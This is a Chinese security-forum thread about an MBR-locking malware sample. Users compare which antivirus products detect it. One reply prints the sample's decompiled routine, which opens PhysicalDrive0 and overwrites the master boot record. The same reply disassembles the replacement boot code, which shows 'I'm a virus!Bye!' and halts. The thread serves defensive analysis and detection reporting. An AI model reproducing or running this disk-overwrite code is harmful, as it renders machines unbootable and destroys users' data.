搜索
楼主: 00006666
收起左侧

[病毒样本] MBRLOCK样本 1X 上传VT首次扫描0引擎检出

  [复制链接]
没有名字ssss
发表于 5 天前 | 显示全部楼层
BD系:大家都win10/11了,没有MBR,这种不检测了
00006666
 楼主| 发表于 5 天前 | 显示全部楼层

感觉这种MBR类的,行为很明显,理论上应该会分析出来的。
vm001
发表于 5 天前 | 显示全部楼层
双击不能运行,右键管理员运行,火绒拦截

本帖子中包含更多资源

您需要 登录 才可以下载或查看,没有帐号?快速注册

x
Hacker-云
发表于 4 天前 | 显示全部楼层
00006666 发表于 2021-11-22 18:01
MBRLOCK样本谨慎实机运行,不过这种样本对于UEFI+WIN10是无效的。

是的。我是WIN10。现在卡巴已经查杀,Avast和360扫描无反应
00006666
 楼主| 发表于 4 天前 | 显示全部楼层
Hacker-云 发表于 2021-11-23 08:02
是的。我是WIN10。现在卡巴已经查杀,Avast和360扫描无反应

已经上报360了,应该24小时内会入库。
wowocock
发表于 4 天前 | 显示全部楼层
00006666 发表于 2021-11-23 09:51
已经上报360了,应该24小时内会入库。

破坏MBR的,应该是黑的了。
__int64 sub_140001530()
{
  HANDLE v0; // rax
  void *v1; // r12
  __int64 result; // rax
  DWORD BytesReturned; // [rsp+4Ch] [rbp-21Ch] BYREF
  __m128i Buffer; // [rsp+50h] [rbp-218h] BYREF
  __int128 v5[31]; // [rsp+60h] [rbp-208h] BYREF

  memset(v5, 0, sizeof(v5));
  strcpy((char *)&v5[1], "virus!Bye!");
  Buffer = _mm_load_si128((const __m128i *)&xmmword_140008020);
  HIWORD(v5[30]) = 0xAA55;
  v5[0] = (__int128)_mm_load_si128((const __m128i *)&xmmword_140008030);
  v0 = CreateFileA("\\\\.\\PhysicalDrive0", 0xC0000000, 3u, 0i64, 3u, 0, 0i64);
  v1 = v0;
  if ( v0 == (HANDLE)-1i64 )
  {
    sub_140007D70("createfile failed...");
    result = 0xFFFFFFFFi64;
  }
  else
  {
    DeviceIoControl(v0, 0x90018u, 0i64, 0, 0i64, 0, &BytesReturned, 0i64);
    WriteFile(v1, &Buffer, 0x200u, &BytesReturned, 0i64);
    DeviceIoControl(v1, 0x9001Cu, 0i64, 0, 0i64, 0, &BytesReturned, 0i64);
    result = 0i64;
  }
  return result;
}
写入的破坏数据。
seg000:0000 ; Segment type: Pure code
seg000:0000 seg000          segment byte public 'CODE' use16
seg000:0000                 assume cs:seg000
seg000:0000                 assume es:nothing, ss:nothing, ds:nothing, fs:nothing, gs:nothing
seg000:0000                 mov     ax, 12h
seg000:0003                 int     10h             ; - VIDEO - SET VIDEO MODE
seg000:0003                                         ; AL = mode
seg000:0005                 mov     bp, 7C18h
seg000:0008                 mov     cx, 18h
seg000:000B                 mov     ax, 1301h
seg000:000E                 mov     bx, 0Ch
seg000:0011                 mov     dx, 0E1Dh
seg000:0014                 int     10h             ; - VIDEO - WRITE STRING (AT,XT286,PS,EGA,VGA)
seg000:0014                                         ; AL = mode, BL = attribute if AL bit 1 clear, BH = display page number
seg000:0014                                         ; DH,DL = row,column of starting cursor position, CX = length of string
seg000:0014                                         ; ES:BP -> start of string
seg000:0016
seg000:0016 loc_16:                                 ; CODE XREF: seg000:loc_16↓j
seg000:0016                 loop    loc_16
seg000:0016 ; ---------------------------------------------------------------------------
seg000:0018                 db  0Dh
seg000:0019                 db  0Ah
seg000:001A                 db  49h ; I
seg000:001B                 db  27h ; '
seg000:001C                 db  6Dh ; m
seg000:001D                 db  20h
seg000:001E                 db  61h ; a
seg000:001F                 db  20h
seg000:0020                 db  76h ; v
seg000:0021                 db  69h ; i
seg000:0022                 db  72h ; r
seg000:0023                 db  75h ; u
seg000:0024                 db  73h ; s
seg000:0025                 db  21h ; !
seg000:0026                 db  42h ; B
seg000:0027                 db  79h ; y
seg000:0028                 db  65h ; e
seg000:0029                 db  21h ; !
seg000:002A                 db    0
seg000:002B                 db    0

评分

参与人数 1人气 +3 收起 理由
00006666 + 3

查看全部评分

xtmatao
发表于 4 天前 | 显示全部楼层
本帖最后由 xtmatao 于 2021-11-23 13:35 编辑

BD扫描安全,双击无反应
00006666
 楼主| 发表于 4 天前 | 显示全部楼层
wowocock 发表于 2021-11-23 10:20
破坏MBR的,应该是黑的了。
__int64 sub_140001530()
{

建议360卫士的主防可以增加对于样本使用SetCriticalProcess触发蓝屏的行为进行拦截,CRITICAL_PROCESS_DIED 蓝屏。

Hacker-云
发表于 4 天前 | 显示全部楼层
00006666 发表于 2021-11-23 09:51
已经上报360了,应该24小时内会入库。

360已经查杀,Avast小红伞无反应
Hacker-云
发表于 4 天前 | 显示全部楼层
实机运行N次,小红伞无反应,刚已瘫痪。

本帖子中包含更多资源

您需要 登录 才可以下载或查看,没有帐号?快速注册

x
您需要登录后才可以回帖 登录 | 快速注册

本版积分规则

手机版|杀毒软件|软件论坛| 卡饭论坛

Copyright © KaFan  KaFan.cn All Rights Reserved.

Powered by Discuz! X3.4( 沪ICP备2020031077号-2 ) GMT+8, 2021-11-27 22:00 , Processed in 0.092149 second(s), 15 queries .

卡饭网所发布的一切软件、样本、工具、文章等仅限用于学习和研究,不得将上述内容用于商业或者其他非法用途,否则产生的一切后果自负,本站信息来自网络,版权争议问题与本站无关,您必须在下载后的24小时之内从您的电脑中彻底删除上述信息,如有问题请通过邮件与我们联系。

快速回复 客服 返回顶部 返回列表